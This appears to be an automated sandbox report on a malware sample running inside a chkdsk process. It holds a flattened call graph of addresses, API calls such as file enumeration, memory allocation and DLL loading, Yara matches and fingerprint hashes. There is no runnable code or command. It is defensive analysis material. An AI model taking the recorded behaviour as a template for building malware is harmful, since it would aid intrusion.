82185 87cd87 82355 87ed00 82185->82355 82187 87cd8d 82378 880bd0 82187->82378 82189 87cd95 82410 881d70 82189->82410 82193 87cda1 82444 8823e0 82193->82444 82195 87cda7 82470 87d720 82195->82470 82199 87cbf8 82198->82199 82203 87cc49 82198->82203 82200 87db00 8 API calls 82199->82200 82199->82203 82201 87cc33 82200->82201 82201->82203 82656 87dd50 82201->82656 82203->81969 82204 87ca20 82203->82204 82205 87ca3c 82204->82205 82209 87cb1b 82204->82209 82206 888710 2 API calls 82205->82206 82205->82209 82210 87ca57 82206->82210 82207 87cbce 82207->81973 82207->81974 82208 883a50 8 API calls 82208->82207 82217 87cbb1 82209->82217 82713 87b570 82209->82713 82213 87b570 4 API calls 82210->82213 82212 87cb8b 82215 87b7f0 5 API calls 82212->82215 82212->82217 82214 87ca8f 82213->82214 82216 879e90 LdrLoadDll 82214->82216 82215->82217 82218 87caa0 82216->82218 82217->82207 82217->82208 82219 879e90 LdrLoadDll 82218->82219 82219->82209 82220->81967 82221->81969 82223 87d037 82222->82223 82224 888460 LdrLoadDll 82222->82224 82225 87d03e 82223->82225 82226 8884a0 2 API calls 82223->82226 82224->82223 82225->82169 82227 87d05c 82226->82227 82228 888710 2 API calls 82227->82228 82229 87d068 82228->82229 82229->82169 82231 87b815 82230->82231 82232 87b837 82231->82232 82233 87b823 82231->82233 82234 879e90 LdrLoadDll 82232->82234 82235 879e90 LdrLoadDll 82233->82235 82236 87b846 82234->82236 82237 87b832 82235->82237 82239 87b340 3 API calls 82236->82239 82238 879e90 LdrLoadDll 82237->82238 82240 87ba34 82237->82240 82241 87b8a6 82238->82241 82239->82237 82240->82174 82242 879e90 LdrLoadDll 82241->82242 82243 87b8d7 82242->82243 82244 87b9d0 82243->82244 82246 87b400 2 API calls 82243->82246 82245 87b400 2 API calls 82244->82245 82247 87b9e9 82245->82247 82248 87b8fa 82246->82248 82271 87b4b0 82247->82271 82250 87b905 82248->82250 82251 87b9af 82248->82251 82252 888710 2 API calls 82250->82252 82255 879e90 LdrLoadDll 82251->82255 82253 87b90f 82252->82253 82257 879e90 LdrLoadDll 
82253->82257 82254 888710 2 API calls 82254->82240 82255->82244 82256 87b9f9 82256->82254 82258 87b933 82257->82258 82259 87b400 2 API calls 82258->82259 82260 87b949 82259->82260 82261 888710 2 API calls 82260->82261 82262 87b953 82261->82262 82263 879e90 LdrLoadDll 82262->82263 82264 87b977 82263->82264 82265 87b400 2 API calls 82264->82265 82266 87b98d 82265->82266 82267 87b4b0 2 API calls 82266->82267 82268 87b99d 82267->82268 82269 888710 2 API calls 82268->82269 82270 87b9a7 82269->82270 82270->82174 82272 87b4d4 82271->82272 82275 888360 82272->82275 82276 88837c 82275->82276 82277 8891e0 LdrLoadDll 82275->82277 82280 5462fb0 LdrInitializeThunk 82276->82280 82277->82276 82278 87b55b 82278->82256 82280->82278 82282 882d88 82281->82282 82283 879e90 LdrLoadDll 82282->82283 82284 882db7 82283->82284 82285 87b340 3 API calls 82284->82285 82287 882dea 82285->82287 82286 882df1 82286->82183 82287->82286 82288 879e90 LdrLoadDll 82287->82288 82289 882e19 82288->82289 82290 879e90 LdrLoadDll 82289->82290 82291 882e3d 82290->82291 82292 87b400 2 API calls 82291->82292 82293 882e61 82292->82293 82294 882ea3 82293->82294 82482 8826c0 82293->82482 82298 879e90 LdrLoadDll 82294->82298 82296 882e7a 82297 883026 82296->82297 82486 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82296->82486 82297->82183 82300 882ec3 82298->82300 82301 87b400 2 API calls 82300->82301 82302 882ee7 82301->82302 82303 882f2d 82302->82303 82304 882f04 82302->82304 82306 8826c0 8 API calls 82302->82306 82305 87b400 2 API calls 82303->82305 82304->82297 82487 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82304->82487 82308 882f5d 82305->82308 82306->82304 82309 882fa3 82308->82309 82310 882f7a 82308->82310 82312 8826c0 8 API calls 82308->82312 82313 87b400 2 API calls 82309->82313 82310->82297 82488 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82310->82488 82312->82310 82314 883002 82313->82314 82315 88304b 
82314->82315 82316 88301f 82314->82316 82317 8826c0 8 API calls 82314->82317 82315->82183 82316->82297 82489 882ab0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 82316->82489 82317->82316 82320 881ab4 82319->82320 82321 879e90 LdrLoadDll 82320->82321 82322 881b81 82321->82322 82323 87b340 3 API calls 82322->82323 82325 881bb4 82323->82325 82324 881bbb 82324->82185 82325->82324 82326 879e90 LdrLoadDll 82325->82326 82327 881be3 82326->82327 82328 87b400 2 API calls 82327->82328 82329 881c23 82328->82329 82330 8826c0 8 API calls 82329->82330 82353 881d43 82329->82353 82331 881c40 82330->82331 82332 881d52 82331->82332 82490 881870 82331->82490 82333 888710 2 API calls 82332->82333 82335 881d5c 82333->82335 82335->82185 82336 881c58 82336->82332 82337 881c63 82336->82337 82338 88a270 2 API calls 82337->82338 82339 881c8c 82338->82339 82340 881cab 82339->82340 82341 881c95 82339->82341 82519 881760 CoInitialize 82340->82519 82343 888710 2 API calls 82341->82343 82345 881c9f 82343->82345 82344 881cb9 82521 888420 82344->82521 82345->82185 82347 881d32 82348 888710 2 API calls 82347->82348 82350 881d3c 82348->82350 82351 88a0a0 2 API calls 82350->82351 82351->82353 82352 881cd7 82352->82347 82354 888420 2 API calls 82352->82354 82526 881690 LdrLoadDll RtlFreeHeap 82352->82526 82353->82185 82354->82352 82356 87ed28 82355->82356 82357 88a270 2 API calls 82356->82357 82359 87ed88 82357->82359 82358 87ed91 82358->82187 82359->82358 82528 87e9c0 82359->82528 82361 87edb8 82363 87edd6 82361->82363 82563 8807c0 11 API calls 82361->82563 82367 87edf0 82363->82367 82565 879c90 LdrLoadDll 82363->82565 82364 87edca 82564 8807c0 11 API calls 82364->82564 82368 87e9c0 10 API calls 82367->82368 82369 87ee1b 82368->82369 82370 87ee3a 82369->82370 82566 8807c0 11 API calls 82369->82566 82372 87ee54 82370->82372 82568 879c90 LdrLoadDll 82370->82568 82375 88a0a0 2 API calls 82372->82375 82373 87ee2e 82567 8807c0 11 API calls 82373->82567 82377 87ee5e 82375->82377 
82377->82187 82379 880bf6 82378->82379 82380 880c08 82379->82380 82381 880c8e 82379->82381 82382 879e90 LdrLoadDll 82380->82382 82386 880c6c 82381->82386 82584 881d90 82381->82584 82383 880c19 82382->82383 82387 880c37 82383->82387 82390 879e90 LdrLoadDll 82383->82390 82389 880c86 82386->82389 82589 886b60 82386->82589 82391 879e90 LdrLoadDll 82387->82391 82388 880ccb 82393 880cea 82388->82393 82394 880d2c 82388->82394 82403 880d20 82388->82403 82389->82189 82390->82387 82392 880c5b 82391->82392 82396 883a50 8 API calls 82392->82396 82397 880d0f 82393->82397 82398 880cf2 82393->82398 82395 879e90 LdrLoadDll 82394->82395 82399 880d3d 82395->82399 82396->82386 82401 88a0a0 2 API calls 82397->82401 82400 88a0a0 2 API calls 82398->82400 82615 880000 82399->82615 82402 880d03 82400->82402 82401->82403 82402->82189 82403->82189 82405 880e3f 82406 88a0a0 2 API calls 82405->82406 82407 880e46 82406->82407 82407->82189 82408 880d57 82408->82405 82621 8806f0 9 API calls 82408->82621 82411 880bd0 11 API calls 82410->82411 82412 87cd9b 82411->82412 82413 87fbc0 82412->82413 82414 87fbe2 82413->82414 82415 879e90 LdrLoadDll 82414->82415 82416 87fdad 82415->82416 82417 879e90 LdrLoadDll 82416->82417 82418 87fdbe 82417->82418 82419 879d60 LdrLoadDll 82418->82419 82420 87fdd5 82419->82420 82623 87fa90 82420->82623 82423 87fa90 11 API calls 82424 87fe4b 82423->82424 82425 87fa90 11 API calls 82424->82425 82426 87fe63 82425->82426 82427 87fa90 11 API calls 82426->82427 82428 87fe7b 82427->82428 82429 87fa90 11 API calls 82428->82429 82430 87fe93 82429->82430 82431 87fa90 11 API calls 82430->82431 82432 87feae 82431->82432 82433 87fec8 82432->82433 82434 87fa90 11 API calls 82432->82434 82433->82193 82435 87fefc 82434->82435 82436 87fa90 11 API calls 82435->82436 82437 87ff39 82436->82437 82438 87fa90 11 API calls 82437->82438 82439 87ff76 82438->82439 82440 87fa90 11 API calls 82439->82440 82441 87ffb3 82440->82441 82442 87fa90 11 API calls 82441->82442 82443 87fff0 82442->82443 
82443->82193 82445 8823fd 82444->82445 82446 879b40 LdrLoadDll 82445->82446 82447 882418 82446->82447 82448 883e50 LdrLoadDll 82447->82448 82467 8825e6 82447->82467 82449 882442 82448->82449 82450 883e50 LdrLoadDll 82449->82450 82451 882455 82450->82451 82452 883e50 LdrLoadDll 82451->82452 82453 882468 82452->82453 82454 883e50 LdrLoadDll 82453->82454 82455 88247b 82454->82455 82456 883e50 LdrLoadDll 82455->82456 82457 882491 82456->82457 82458 883e50 LdrLoadDll 82457->82458 82459 8824a4 82458->82459 82460 883e50 LdrLoadDll 82459->82460 82461 8824b7 82460->82461 82462 883e50 LdrLoadDll 82461->82462 82463 8824ca 82462->82463 82464 883e50 LdrLoadDll 82463->82464 82465 8824df 82464->82465 82466 8826c0 8 API calls 82465->82466 82465->82467 82469 882561 82466->82469 82467->82195 82469->82467 82638 881fa0 LdrLoadDll 82469->82638 82471 87d783 82470->82471 82639 880130 82471->82639 82473 87d7e4 82475 881d90 8 API calls 82473->82475 82474 87d7a6 82474->82473 82648 87d5d0 82474->82648 82477 87d807 82475->82477 82478 87d5d0 8 API calls 82477->82478 82479 87d845 82477->82479 82478->82479 82480 87d5d0 8 API calls 82479->82480 82481 87cdcb 82480->82481 82481->81961 82483 88273d 82482->82483 82484 883a50 8 API calls 82483->82484 82485 8828b9 82483->82485 82484->82485 82485->82296 82486->82294 82487->82303 82488->82309 82489->82315 82491 88188c 82490->82491 82492 879b40 LdrLoadDll 82491->82492 82493 8818a7 82492->82493 82494 8818b0 82493->82494 82495 883e50 LdrLoadDll 82493->82495 82494->82336 82496 8818c7 82495->82496 82497 883e50 LdrLoadDll 82496->82497 82498 8818dc 82497->82498 82499 883e50 LdrLoadDll 82498->82499 82500 8818ef 82499->82500 82501 883e50 LdrLoadDll 82500->82501 82502 881902 82501->82502 82503 883e50 LdrLoadDll 82502->82503 82504 881918 82503->82504 82505 883e50 LdrLoadDll 82504->82505 82506 88192b 82505->82506 82507 879b40 LdrLoadDll 82506->82507 82508 881954 82507->82508 82509 883e50 LdrLoadDll 82508->82509 82518 8819f0 82508->82518 82510 881978 82509->82510 
82511 879b40 LdrLoadDll 82510->82511 82512 8819ad 82511->82512 82513 883e50 LdrLoadDll 82512->82513 82512->82518 82514 8819ca 82513->82514 82515 883e50 LdrLoadDll 82514->82515 82516 8819dd 82515->82516 82517 883e50 LdrLoadDll 82516->82517 82517->82518 82518->82336 82520 8817c5 82519->82520 82520->82344 82522 8891e0 LdrLoadDll 82521->82522 82523 88843c 82522->82523 82527 5462ac0 LdrInitializeThunk 82523->82527 82524 88845b 82524->82352 82526->82352 82527->82524 82529 87ea58 82528->82529 82530 879e90 LdrLoadDll 82529->82530 82531 87eaf6 82530->82531 82532 879e90 LdrLoadDll 82531->82532 82533 87eb11 82532->82533 82534 87b400 2 API calls 82533->82534 82535 87eb36 82534->82535 82536 87ecae 82535->82536 82538 8883a0 2 API calls 82535->82538 82537 87ecbf 82536->82537 82569 87db00 82536->82569 82537->82361 82540 87eb61 82538->82540 82541 87eca4 82540->82541 82543 87eb6c 82540->82543 82542 888710 2 API calls 82541->82542 82542->82536 82544 888710 2 API calls 82543->82544 82545 87ebaf 82544->82545 82581 88a340 LdrLoadDll 82545->82581 82547 87ebe8 82548 87ebef 82547->82548 82549 87b400 2 API calls 82547->82549 82548->82361 82550 87ec13 82549->82550 82550->82537 82551 8883a0 2 API calls 82550->82551 82552 87ec38 82551->82552 82553 87ec3f 82552->82553 82554 87ec8b 82552->82554 82555 888710 2 API calls 82553->82555 82556 888710 2 API calls 82554->82556 82557 87ec49 82555->82557 82558 87ec95 82556->82558 82582 87e130 LdrLoadDll 82557->82582 82558->82361 82560 87ec66 82560->82537 82583 87e740 8 API calls 82560->82583 82562 87ec7c 82562->82361 82563->82364 82564->82363 82565->82367 82566->82373 82567->82370 82568->82372 82570 87db25 82569->82570 82571 879e90 LdrLoadDll 82570->82571 82572 87dbe0 82571->82572 82573 879e90 LdrLoadDll 82572->82573 82574 87dc04 82573->82574 82575 883a50 8 API calls 82574->82575 82577 87dc57 82575->82577 82576 87dd11 82576->82537 82577->82576 82578 879e90 LdrLoadDll 82577->82578 82579 87dcbe 82578->82579 82580 883a50 8 API calls 82579->82580 82580->82576 
82581->82547 82582->82560 82583->82562 82585 879e90 LdrLoadDll 82584->82585 82586 881dac 82585->82586 82587 883a50 8 API calls 82586->82587 82588 881e65 82586->82588 82587->82588 82588->82386 82590 886b6e 82589->82590 82591 886b75 82589->82591 82590->82388 82592 879b40 LdrLoadDll 82591->82592 82593 886ba0 82592->82593 82594 88a270 2 API calls 82593->82594 82613 886cf4 82593->82613 82595 886bb8 82594->82595 82595->82613 82622 8801a0 LdrLoadDll 82595->82622 82597 886bd6 82598 883e50 LdrLoadDll 82597->82598 82599 886bec 82598->82599 82600 883e50 LdrLoadDll 82599->82600 82601 886c08 82600->82601 82602 883e50 LdrLoadDll 82601->82602 82603 886c24 82602->82603 82604 883e50 LdrLoadDll 82603->82604 82605 886c43 82604->82605 82606 883e50 LdrLoadDll 82605->82606 82607 886c5f 82606->82607 82608 883e50 LdrLoadDll 82607->82608 82609 886c7b 82608->82609 82610 883e50 LdrLoadDll 82609->82610 82611 886ca1 82610->82611 82612 88a0a0 2 API calls 82611->82612 82614 886ce4 82611->82614 82612->82613 82613->82388 82614->82388 82616 880026 82615->82616 82617 879e90 LdrLoadDll 82616->82617 82618 88005c 82617->82618 82619 87b730 10 API calls 82618->82619 82620 88011f 82619->82620 82620->82408 82621->82408 82622->82597 82624 87fab9 82623->82624 82625 883e50 LdrLoadDll 82624->82625 82626 87faf0 82625->82626 82627 883e50 LdrLoadDll 82626->82627 82628 87fb08 82627->82628 82629 883e50 LdrLoadDll 82628->82629 82631 87fb24 82629->82631 82630 87fbac 82630->82423 82631->82630 82632 87fb4e FindFirstFileW 82631->82632 82632->82630 82636 87fb69 82632->82636 82633 87fb93 FindNextFileW 82635 87fba5 FindClose 82633->82635 82633->82636 82635->82630 82636->82633 82637 87f970 11 API calls 82636->82637 82637->82636 82638->82469 82640 880146 82639->82640 82641 879e90 LdrLoadDll 82639->82641 82642 88015a 82640->82642 82643 879e90 LdrLoadDll 82640->82643 82641->82640 82644 879e90 LdrLoadDll 82642->82644 82643->82642 82645 880174 82644->82645 82646 883a50 8 API calls 82645->82646 82647 880188 82645->82647 
82646->82647 82647->82474 82649 87d600 82648->82649 82655 87d715 82648->82655 82650 883a50 8 API calls 82649->82650 82651 87d618 82650->82651 82652 883a50 8 API calls 82651->82652 82651->82655 82653 87d648 82652->82653 82654 88a0a0 2 API calls 82653->82654 82653->82655 82654->82655 82655->82473 82657 87dd75 82656->82657 82658 883e50 LdrLoadDll 82657->82658 82659 87ddc0 82658->82659 82660 87e11f 82659->82660 82661 883a50 8 API calls 82659->82661 82660->82203 82662 87dddc 82661->82662 82662->82660 82663 888960 2 API calls 82662->82663 82664 87de12 82663->82664 82665 87e107 82664->82665 82666 88b380 3 API calls 82664->82666 82667 88a0a0 2 API calls 82665->82667 82668 87de31 82666->82668 82667->82660 82668->82665 82669 87df27 82668->82669 82670 888180 2 API calls 82668->82670 82707 87aba0 LdrLoadDll LdrInitializeThunk 82669->82707 82671 87deb1 82670->82671 82671->82669 82673 87deb9 82671->82673 82675 87df0d 82673->82675 82676 87dedc 82673->82676 82679 87aa90 2 API calls 82673->82679 82674 87df52 82674->82665 82678 87df87 82674->82678 82682 87aa90 2 API calls 82674->82682 82677 88a0a0 2 API calls 82675->82677 82680 888710 2 API calls 82676->82680 82681 87df1d 82677->82681 82708 87a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82678->82708 82679->82676 82684 87deec 82680->82684 82681->82203 82682->82678 82686 8875b0 2 API calls 82684->82686 82685 87dfa9 82687 87dfb7 82685->82687 82688 87e0e6 82685->82688 82686->82675 82709 888780 LdrLoadDll 82687->82709 82690 88a0a0 2 API calls 82688->82690 82691 87e0fd 82690->82691 82691->82203 82692 87dfd6 82693 87d200 3 API calls 82692->82693 82694 87e03b 82693->82694 82694->82665 82695 87e046 82694->82695 82696 88a0a0 2 API calls 82695->82696 82697 87e06a 82696->82697 82710 8882e0 LdrLoadDll 82697->82710 82699 87e07e 82700 888290 2 API calls 82699->82700 82701 87e0a5 82700->82701 82702 87e0ac 82701->82702 82711 8882e0 LdrLoadDll 82701->82711 82702->82203 82704 87e0ce 82712 8880a0 LdrLoadDll 82704->82712 82706 87e0dc 
82706->82203 82707->82674 82708->82685 82709->82692 82710->82699 82711->82704 82712->82706 82714 87b59c 82713->82714 82715 87b400 2 API calls 82714->82715 82716 87b5e6 82715->82716 82717 87b688 82716->82717 82718 888420 2 API calls 82716->82718 82717->82212 82721 87b60d 82718->82721 82719 87b67f 82720 888710 2 API calls 82719->82720 82720->82717 82721->82719 82722 888420 2 API calls 82721->82722 82723 87b694 82721->82723 82722->82721 82724 888710 2 API calls 82723->82724 82725 87b69d 82724->82725 82726 87b70c 82725->82726 82727 87b400 2 API calls 82725->82727 82726->82212 82728 87b6b6 82727->82728 82728->82726 82729 883e50 LdrLoadDll 82728->82729 82729->82726 82732 54629f0 LdrInitializeThunk 82734 887300 82735 88a020 2 API calls 82734->82735 82737 88733b 82735->82737 82736 88741c 82737->82736 82738 879b40 LdrLoadDll 82737->82738 82739 887371 82738->82739 82740 883e50 LdrLoadDll 82739->82740 82742 88738d 82740->82742 82741 8873a0 Sleep 82741->82742 82742->82736 82742->82741 82745 886f30 LdrLoadDll 82742->82745 82746 887130 LdrLoadDll 82742->82746 82745->82742 82746->82742
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 0087FB5F
• FindNextFileW.KERNELBASE(?,00000010), ref: 0087FB9E
• FindClose.KERNELBASE(?), ref: 0087FBA9
Memory Dump Source
• Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 154f4dd43d8fa96e90b800bd0237c4e333e727612d7a268e1e7915b805a11a03
• Instruction ID: f133438fcb10ed49e171669bd50b289d0882f4a68b50824cb347bff84efcaa26
• Opcode Fuzzy Hash: 154f4dd43d8fa96e90b800bd0237c4e333e727612d7a268e1e7915b805a11a03
• Instruction Fuzzy Hash: EE318571500308BBDB21DF65CC85FEB777CFF84714F148559B649E6181D670EA848BA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 0087FB5F
• FindNextFileW.KERNELBASE(?,00000010), ref: 0087FB9E
• FindClose.KERNELBASE(?), ref: 0087FBA9
Memory Dump Source
• Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
• Instruction ID: 866be653a6b0120b45e71c6bd25f304a902742115293571a0f8ff8da9b2aeb1c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 493152B1900308BBDB20DF65CC85FEB777DEF84B14F148559BA49E6181D670EA848BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00883BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00883BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0088862D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                                • Instruction ID: 484c37b9fbaa4b97d70c9854e4d803a8e02f8219824736d660d1caaa141afceb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0BDB2204208ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtReadFile.NTDLL(00883D72,5E972F65,FFFFFFFF,00883A31,?,?,00883D72,?,00883A31,FFFFFFFF,5E972F65,00883D72,?,00000000), ref: 008886D5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                                                                                                                                                                                                • Instruction ID: 6df496299a91cce28b1ef261cc2acf88f76a3de04cf378a5077b678c0781d131
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF0F4B6214108AFCB14DF89DC84EEB77A9FF8C754F158249FA5DA7241D630E911CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtReadFile.NTDLL(00883D72,5E972F65,FFFFFFFF,00883A31,?,?,00883D72,?,00883A31,FFFFFFFF,5E972F65,00883D72,?,00000000), ref: 008886D5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                                • Instruction ID: ac242117f4c3218d1cc05c3142e8b7e0b08c8f5ef65bdf7a3103c14281310c29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0A4B6204208ABCB14DF8DDC85EEB77ADEF8C754F158249FA1D97241D630E911CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00872D11,00002000,00003000,00000004), ref: 008887F9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                                • Instruction ID: 16b7b75467848561edc14a2560d49a823b2dd64f6a5ab7ce728517bccdf45a88
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F015B6204208ABCB14DF89CC85EAB77ADEF88750F158149FE0997241C630F910CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtClose.NTDLL(00883D50,?,?,00883D50,00000000,FFFFFFFF), ref: 00888735
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                • Opcode ID: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                                                                                                                                                                                                • Instruction ID: 1959abef81487fb484dc12b3a60f0586c00e6da41477a1a716c30c2b577605a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42E08C762082106BE710EBA88C49EEB7B28EF44250F1444A9F98D9B242C230E600C7A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtClose.NTDLL(00883D50,?,?,00883D50,00000000,FFFFFFFF), ref: 00888735
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                                • Instruction ID: 429354b2f750d8dbcb58ab4eab74804161b8d024c2f2ae3b1ea741823f2585a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AD01776204214ABD710EB98CC89EAB7BACEF48B60F154499FA599B242C530FA00C7E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

